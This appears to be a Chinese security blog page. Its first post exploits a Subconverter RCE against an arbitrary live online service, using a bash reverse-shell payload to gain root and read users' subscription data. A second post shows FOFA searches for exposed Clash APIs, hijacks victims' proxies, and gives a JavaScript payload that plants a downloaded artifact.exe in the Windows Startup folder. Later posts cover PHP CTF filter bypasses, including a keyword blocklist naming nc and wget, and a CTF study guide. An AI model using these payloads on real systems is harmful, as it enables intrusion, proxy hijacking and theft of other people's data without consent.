Posts

漏洞在此之前已经被发现，更多有关漏洞细节可以自行分析该项目 相信能点进来的各位都是使用过订阅转换服务的。通过这类在线工具可以轻松地将v2ray的节点分享链接格式转换为clash使用的订阅链接，或者将clash的订阅格式转换为v2ray使用的节点分享链接，也有人用来转换机场提供的默认clash配置，日常使用的频率非常高。 但订阅转换节点存在的安全风险不仅是有可能被第三方转换服务在后台偷走你的节点信息，就算你使用的转换服务是由节点提供商提供的（节点提供商总不可能偷自己的节点），也存在被人盗取的风险，甚至连提供商自己都不知道。 漏洞描述 目前市面上主流的订阅转换服务，例如肥羊、品云、边缘等，使用的都是基于Subconverter项目搭建的。而目前Github上的Subconverter开源项目中最新的release仍然存在RCE漏洞。也就是说，不管转换服务用的是哪个版本，都有可能被黑客入侵，从而盗走所有人的节点信息。 漏洞复现 随便在网上找个订阅转换服务 一只看着很欠揍的狐狸，就你了 随便输入个符合格式的内容，跳转出后端订阅地址 复制，并加上/version 成功展示subconverter版本。不过subconverter目前最新版只有0.7.2，所以这个服务的老板应该是自己编译改的。不管他，继续。 在下面这些接口命令中尝试访问出配置文件内容（分别使用不同的接口） # qx-script接口(0.7.2-be878e1后被删除) /qx-script?url=cHJlZi50b21s /qx-script?url=cHJlZi55bWw /qx-script?url=cHJlZi5pbmk # convert接口 /convert?url=pref.toml /convert?url=pref.ini /convert?url=pref.yml 这是由于路径穿越过滤不严谨导致配置文件内容泄露 可以看到暴露的token值为默认值password 来到配置文件最下面，看到缓存开启 好的，准备开始植入恶意指令。首先准备好木马 function parse(x){ os.exec(["sh","-c","bash -i >& /dev/tcp/{your_ip}/1880 0>&1"]) } 把{your_ip}换成你的vps ip，保存成一个txt后在这个目录下开个简单的http服务就行 再开个窗口把监听打开，准备接收反弹shell 在刚才的网址后面加上这一段，让订阅服务主动将准备好的木马读到缓存里 # 指令写入缓存目录 /sub?target=clash&url=http://{your_ip}/payload 接着把url参数后面的内容用md5加密，再放到下面这段链接里，用来触发我们的木马 /sub?target=clash&url=script:cache/{your_md5},1&token={token} 记得把{your_md5}和{token}改掉。token就是上面刚刚提到的那个 回车访问，在刚刚等待shell的窗口里就能拿到shell啦 运气不错，是个root。不过还有更刺激的，我们使用ls /etc/systemd/system查看一下他开启的服务 可以看到有个特征比较明显的sub，还有一个xui面板 之后就能用journal -fw sub看到所有在他的sub服务中转换过的订阅信息了。一览无余 漏洞分析 正在写…. 漏洞修复 正在写….

漏洞描述 Clash开发于Electron。Electron是GitHub开发的一个使用JavaScript、HTML和CSS构建桌面应用程序的开源框架。它通过使用Node.js和Chromium的渲染引擎完成跨平台的桌面GUI应用程序的开发，因此Electron拥有直接执行Node.js代码的能力，并且内置了Chromium内核，通过一个XSS漏洞就有可能导致远程代码执行的危害。 根据Clash官方文档的介绍（https://clash.gitbook.io/doc/restful-api），Clash存在一套RESTful API可以用于控制自身，能获取Clash中的一些信息，同时也能控制Clash内部的配置。 在公网中，有许多分配到公网ip的Clash设备暴露了自身的RESTful API端口，导致黑客能够直接使用clash dashboard知道其节点信息以及控制其代理端口，达到使用被害者设备代理翻墙的目的 同时，黑客也能利用以上拓补关系和较低版本Clash的历史漏洞（详见此issue：[Bug]: Remote Code Execution/远程代码执行 #3891），达到Getshell的目的 漏洞复现 在FOFA中使用下面语法对暴露的Clash API进行搜集 clash：https://fofa.info/result?qbase64=IntcImhlbGxvXCI6XCJjbGFzaFwifSI%3D clash.meta：https://fofa.info/result?qbase64=IntcImhlbGxvXCI6XCJjbGFzaC5tZXRhXCJ9Ig%3D%3D openclash：https://fofa.info/result?qbase64=cG9ydD0iOTA5MCIgJiYgYm9keT0ie1wibWVzc2FnZVwiOlwiVW5hdXRob3JpemVkXCJ9Ig%3D%3D 随机挑选，在Clash dashboard中导入拥有如下返回的IP地址和端口 即可看到该设备的节点信息 在设置中查看HTTP代理端口或混合代理端口信息 使用SwitchyOmega插件进行代理 即可访问Google 另外，如果想Getshell可以利用下面这段js代码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <title>Hack it！</title> </head> <body> <div id="result"></div> <script> const data = { payload: "mixed-port: 7890\nallow-lan: false\nmode: rule\nlog-level: warning\nproxy-groups: \n - name: 系统被入侵\n type: select\n use:\n - provider1\nproxy-providers:\n provider1:\n type: http\n url: 'http://192.168.2.5/artifact.exe'\n interval: 36000\n path: ../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/\n healthcheck:\n enable: false\n interval: 600\n url: http://www.gstatic.com/generate_204" }; fetch('http://{yourip}:{yourport}/configs', { method: 'PUT', headers: { 'Content-type': 'application/json; charset=utf-8', //'Authorization': 'Bearer 123456' //clash鉴权头部 }, body: JSON.stringify(data), }) .then(response => { if (response.status === 204) { result.innerText = '入侵成功！'; } else { response.json() .then(jsonData => { result.innerText = '入侵失败！' + JSON.stringify(jsonData); }) } }) .catch(error => { result.innerText = '执行失败！' + error.message; }); </script> </body> </html> 这段payload的作用是自动下载192.168.2.5提供的artifact.exe木马到Startup开机自启目录，这个操作将在clash重启或者切换节点时候执行。具体情况修改ip和端口即可。 ...

trim() 这个函数可以过滤掉一些特殊符号，但是换页符\f不过滤。这个方法对is_numeric也有效 带 . 的变量名 php中有个特性就是如果传入[，它被转化为_之后，后面的字符就会被保留下来不会被替换。php中有个特性就是如果传入[，它被转化为_之后，后面的字符就会被保留下来不会被替换 先看看下面这个变量的传入 isset($_POST['CTF_SHOW.COM']) 这个变量如果按正常逻辑，应该传入CTF_SHOW.COM=1，但根据这个特性，就只能传入CTF[SHOW.COM= 自己构建传值方法 先看代码 include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\|\/|~|`|!|\@|#|\%|\^|*|-|+|=|{|}|\"|\'|\,|.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){ eval("$c".";"); if($fl0g==="flag_give_me"){ echo $flag; } } } 这里介绍一种很特别的方法 highlight_file熟悉吧？但是这里没法传入flag，怎么办？看下面的payload就知道了 GET:?shell=flag.php POST:CTF_SHOW=&CTF[SHOW.COM=&fun=highlight_file($_GET[shell]) $_SERVER $_SERVER 是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。更多信息可以参考这里 上面那道题的代码可以通过下面payload绕过。 意思就是通过$_SERVER[‘argv’]将$a变成数组，利用数组这个“障眼法”，在eval处执行parse_str将fl0g=flag_give_me变成一条命令（变量），同时还绕过第一个if中的!isset($_GET[‘fl0g’]))，用+来进行分隔，使得数组中有多个数值。执行eval函数也就是执行$c即是parse_str($a[1])，使得fl0g=flag_give_me，从而进入第三个if语句。 GET：?a=1+fl0g=flag_give_me POST：CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1]) 或者 GET:?$fl0g=flag_give_me POST:CTF_SHOW=&CTF[SHOW.COM=&fun=assert($a[0]) $_SERVER[‘QUERY_STRING’] ‘QUERY_STRING’ 这一参数的作用是接收所有get数据。更多类似参数可以看这里 _() _()是一个函数 _()==gettext() 是gettext()的拓展函数，开启text扩展。需要php扩展目录下有php_gettext.dll get_defined_vars() get_defined_vars 函数返回由所有已定义变量所组成的数组 这样可以获得 $flag stripos() 这个函数存在路径穿越漏洞，可以使用../..返回上级目录 正则表达式溢出 在php中正则表达式进行匹配有一定的限制，超过限制直接返回false 例如，在preg_replace函数的匹配规则种，被匹配的参数只要够大（25万个very就行），就能让这个函数强行输出false 变量覆盖绕过 先来看这段代码 if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){ eval(substr($F,0,6)); }else{ die("6个字母都还不够呀?!"); }} 很明显是要我们读取flag.php的内容，但是F被substr过滤处理，所以需要一点特殊的方法来绕过 这里就直接放payload，可以使sleep被执行（这里的sleep是shell的sleep，不是php） 为什么这句payload可以被执行呢？首先，substr把 ...

tab绕过 非常少见的一种绕过形式，看标题就知道怎么操作了吧，想必就不用多介绍了 变量覆盖 先来看看下面这题 include('flag.php');error_reporting(0);$error='你还想要flag嘛？';$suces='既然你想要那给你吧！';foreach($_GET as $key => $value){ if($key==='error'){ die("what are you doing?!"); } $$key=$$value;}foreach($_POST as $key => $value){ if($value==='flag'){ die("what are you doing?!"); } $$key=$$value;}if(!($_POST['flag']==$flag)){ die($error);}echo "your are good".$flag."\n";die($suces); 想拿到flag的方法无非就是利用die($error)和die($suces)这两个函数 先上分别利用到这两个函数的payload 方法一： POST：error=a GET：a=flag 方法二 GET：a=flag&flag= 方法一利用的是一次POST判断和一次GET判断，达到第三变量a传值的目的 而方法二则是利用两次GET传值进行变量覆盖，并且绕过了下面的if(!($_POST['flag']==$flag)) md5无法解析数组 RT，返回值均为null parse_str() 把查询字符串解析到变量中。使用参考如下 传值的艺术 发现了一个十分微妙的地方，先来看看题目 <?php highlight_file(__FILE__); error_reporting(0); include("flag.php"); ​ if(isset($_POST['v1'])){ $v1 = $_POST['v1']; $v3 = $_GET['v3']; parse_str($v1,$v2); if($v2['flag']==md5($v3)){ echo $flag; } ​ } ?> 这里有两种方法可以拿到flag，第一种是通过md5匹配，另一种是通过md5处理数组返回均为null这个特点，结合弱比较来进行 但当我在传值的时候发现了一个有趣的现象，直接看下面这些结果你就能看出端倪 #有flag v1=flag=0cc175b9c0f1b6a831c399e269772661 v3=a #无flag v1="flag=0cc175b9c0f1b6a831c399e269772661" v3=a #有flag v1="flag=0" v3[]=1 #无flag v1=flag=0 v3[]=1 根据后两条有无flag的结果，结合弱比较表可以推断，有加双引号的一组将flag值赋值为了数字型的0，而每加的赋值为了字符型的0 ...

**⚠︎温馨提示：**本学习路线适合TKK网安宝宝体质，全程可0基础观看。也欢迎想更加了解网络安全竞赛的你们踊跃举手发问🙋，我在评论区等你们😊。 哈喽，相信在看这篇学习路线的你一定是对网络安全，或者说“黑客技术”有着的进一步学习的信心，想进一步了解关于网络安全竞赛的事宜 不论你之前对这方面的掌握有多少，是不是脚本小子，会不会编程语言，数学好不好，甚至有没有计算机基础，都不妨碍你在黑客的领域进一步探索与学习。 本篇学习路线分为两个部分，“简介“和”学习步骤”。如果你想了解特定领域的内容，可以点击目录辅助观看噢 CTF简介 什么是CTF？ CTF（Capture The Flag，夺旗赛）CTF 的前身是传统黑客之间的网络技术比拼游戏，起源于 1996 年第四届 DEFCON（世界黑客大会），以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CTF是一种流行的信息安全竞赛形式，其英文名可直译为“夺得Flag”，也可意译为“夺旗赛”。其大致流程是，参赛团队之间通过进行攻防对抗、程序分析等形式，率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容，并将其提交给主办方，从而夺得分数。为了方便称呼，我们把这样的内容称之为**“flag”**🚩。 flag所表示的为目标服务器上存储的一些敏感机密的信息, 这些信息正常情况下是不能对外暴露的。选手利用目标的一些漏洞，获取到flag，其表示的即为在真实的黑客攻击中窃取到的机密信息。 一般情况下flag拥有固定格式为flag{xxxxx}，有些比赛会把flag关键词替换，例如我们XUJC Lab平台的flag为xujc{xxxxx}，利用固定格式来反推flag也是一种常见的解题思路 👀正常情况下，一场比赛中每支队伍人数为3到5人不定，每个人负责不同方向的题目（详细请往下看）。由于团队成员有各自不同方向的题目分配，因此就不存在一些其他比赛常见的”一人不会，队友带飞“的雷人场面。 🧑‍💻对于一个专业的黑客来说，拥有CTF经验是必不可少的。参加各大CTF赛事能够让你更加灵活地适应各类实战环境。而CTF考验最多的则是对一些从未被发现过的漏洞的挖掘，是最真实的黑客攻击过程。 CTF比赛的内容是什么？ 和ACM的单一算法题不同，传统CTF比赛中有分为多种不同方向的题目。一般有web，pwn，reverse，misc和crypto等方向，近些年来又加入了诸如osint，Android，blockchain，AI等新方向。下面就让我们一一介绍 🌏web Web类题目大部分情况下和网络相关技能有关。主要考察选手对于网络攻防的一些知识技巧。诸如SQL注入、信息伪造、远程恶意代码执行、漏洞挖掘等等常见网络攻击手段。一般情况下Web题目会给出一个能够访问的网址，然后要求对其进行攻击。部分题目会给出网站源代码供漏洞挖掘。 实战案例：网站入侵，内网渗透 建议：适合喜欢研究网络有关的成员学习，也适合当作CTF入门方向 🔧pwn pwn这个名字最早也是出于世界黑客大会，从黑客们以攻破设备或者系统后的”boom“发音而来。Pwn类题目重点考察选手对于设备和系统底层逻辑漏洞的挖掘和利用能力，其攻破手段也通常在堆栈溢出、格式化漏洞、UAF、Double Free等常见底层二进制漏洞上。选手需要根据题目中给出的二进制可执行文件进行逆向分析，找出其中的漏洞并进行利用，编写对应的漏洞攻击脚本(Exploit)，进而对主办方给出的远程服务器进行攻击并获取flag 实战案例：iphone越狱，路由器固件破解，操作系统提权 建议：适合对计算机硬件、计算机底层逻辑感兴趣的成员学习，学习门槛较高，对计算机原理功底要求高。不适合作为入门方向学习 🧑‍🔧reverse 顾名思义，reverse的含义是”逆向“。这类题目考察选手对软件的逆向工程能力。题目会给出一个可执行文件。选手需要逆向给出的程序，分析其程序工作原理。最终根据程序行为等提示找到flag 实战案例：游戏破解，游戏外挂编写 建议：适合喜欢研究软件破解、外挂编写的成员学习，对程序执行逻辑的分析能力要求高。 🔑crypto crypto题目考察选手对密码学相关知识的了解程度，诸如RSA、AES、DES等都是密码学题目的常客。有些时候也会给出一个加密脚本和密文，根据加密流程逆推出明文。 实战案例：程序加密逆向 建议：适合喜欢数学、或数学成绩较好的成员学习。（鉴于难度奇高，不推荐学习） 🤹misc misc意为杂项，即不包含在以上分类的题目都会放到这个分类。题目会给出一个附件。选手下载该附件进行分析，最终得出flag。misc常见的题型有图片隐写、视频隐写、文档隐写、流量分析、协议分析、游戏、IoT相关等等。五花八门，种类繁多。 实战案例：信息隐藏 建议：适合喜欢研究使用各类工具软件（文本处理、图像处理、音频处理）的成员学习，适合作为入门方向学习。 🔎osint osint早期被归纳为misc。其实就是近年来在各大视频网站上火起来的“网络迷踪”，也叫情报分析。题目通过提供一张照片、一段话或是其他任意形式的线索，供选手寻找一些信息（例如某个建筑的名字、某个时间、甚至某个人的名字以及其他敏感信息），并作为flag提交 实战案例：参考柯南😂 建议：适合所有成员学习，可以配合misc作为入门方向，但不适合专攻 📱android android题考验选手对安卓系统的了解程度。通常以APK逆向，安卓系统“Root”等题目为主。 实战案例：安卓系统“Root”，安卓手机软件/游戏破解 建议：参考reverse的建议 🔗blockchain blockchain方向主要以区块链安全为主。题目有诸如虚拟货币钱包破解等。（该方向出现概率较小，因此可参照题目类型也较少。） 实战案例：比特币钱包盗用 建议：建议作为学习完上述某一方向后的拓展方向，不适合专攻 🤖AI 近年来大火的一个赛道，甚至有独立出CTF的AI安全比赛。出现在CTF中的题目将让选手自己制作AI模型，来检测出题者给出的病毒或恶意文件，利用AI分析出的数据拼凑出正确的flag 实战案例：垃圾邮件/短信检测，新型杀毒软件 建议：适合对机器学习感兴趣的成员学习 CTF比赛模式 说了这么多供你选择的方向，接下来就来看看各个方向要在不一样的比赛模式里要怎么大展身手吧🫵 😎值得一提的是，和大部分“闭卷式”的比赛不一样（例如ACM算法竞赛），为了模拟最真实的黑客入侵环境，不论是什么模式的CTF比赛，都是可以自由上网查阅资料的 Jeopardy-解题模式 （最经典🎻） 参赛队伍可以通过互联网或者现场网络线下参与，参数队伍通过与在线环境交互或文件离线分析，解决网络安全技术挑战获取相应分值，类似于 ACM 算法竞赛、信息学奥林匹克赛的根据总分和时间来进行排名。 这个解题模式一般会设置 一血(First Blood) 、 二血(Second Blood) 、 三血(Third Blood) ，也即最先完成的前三支队伍会获得额外分值，所以这不仅是对首先解出题目的队伍的分值鼓励，也是一种团队能力的间接体现。 ...